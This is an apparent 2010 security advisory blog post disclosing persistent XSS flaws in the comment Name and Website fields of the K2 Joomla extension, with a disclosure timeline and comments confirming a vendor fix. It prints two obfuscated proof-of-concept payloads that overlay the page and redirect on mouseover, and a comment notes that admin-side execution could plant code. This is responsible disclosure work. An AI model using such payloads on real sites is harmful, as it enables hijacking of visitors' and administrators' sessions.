Saturday, 11 September 2010 12:08

K2 v2.3, the popular Joomla! CCK extension, suffers from persistent XSS vulnerabilities in its comment facility.

Comment "Name" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

Comment "Website" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

NOTE: also executes in admin!

Timeline

  • Vulnerabilities Discovered: 24 August 2010
  • Vendor Notified: 24 August 2010
  • Vendor Response: 25 August 2010
  • Update Available: ... 2010
  • Disclosure: 11 September 2010
Last Updated on Thursday, 30 September 2010 17:34
 
Comments (6)
1 Monday, 20 September 2010 11:32
JoomlaWorks
This has been addressed in the coming v2.4.

Additionally, the above vulnerability is only possible only if you allow comment editing permissions to members in your site, usually "trusted" people.

Thanks
2 Monday, 20 September 2010 12:51
Jeff Channell
I disagree. The exploit is entered on the frontend comment form, using only the credentials necessary to post a comment - hardly a "trusted" position. The fact that you have to be admin to trigger the exploit makes it more dangerous than usual - executing arbitrary code as admin means I can load up a hidden iframe, install my own php code, etc.
3 Monday, 20 September 2010 22:23
Jeff Channell
JoomlaWorks,

I just tested the latest SVN and you managed to get the frontend XSS, however the Comments panel in administrator is still vulnerable to the Website field XSS...
4 Wednesday, 22 September 2010 07:37
JoomlaWorks
All fixed now in the official 2.4 release available to download on getk2.org

Thanks Jeff ;)
5 Wednesday, 22 September 2010 16:30
K2Joom
I just tested the new v2.4 release and I could not reproduce this issue.
6 Wednesday, 22 September 2010 17:03
Jeff Channell
Same here, 2.4 seems to have this issue resolved...

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions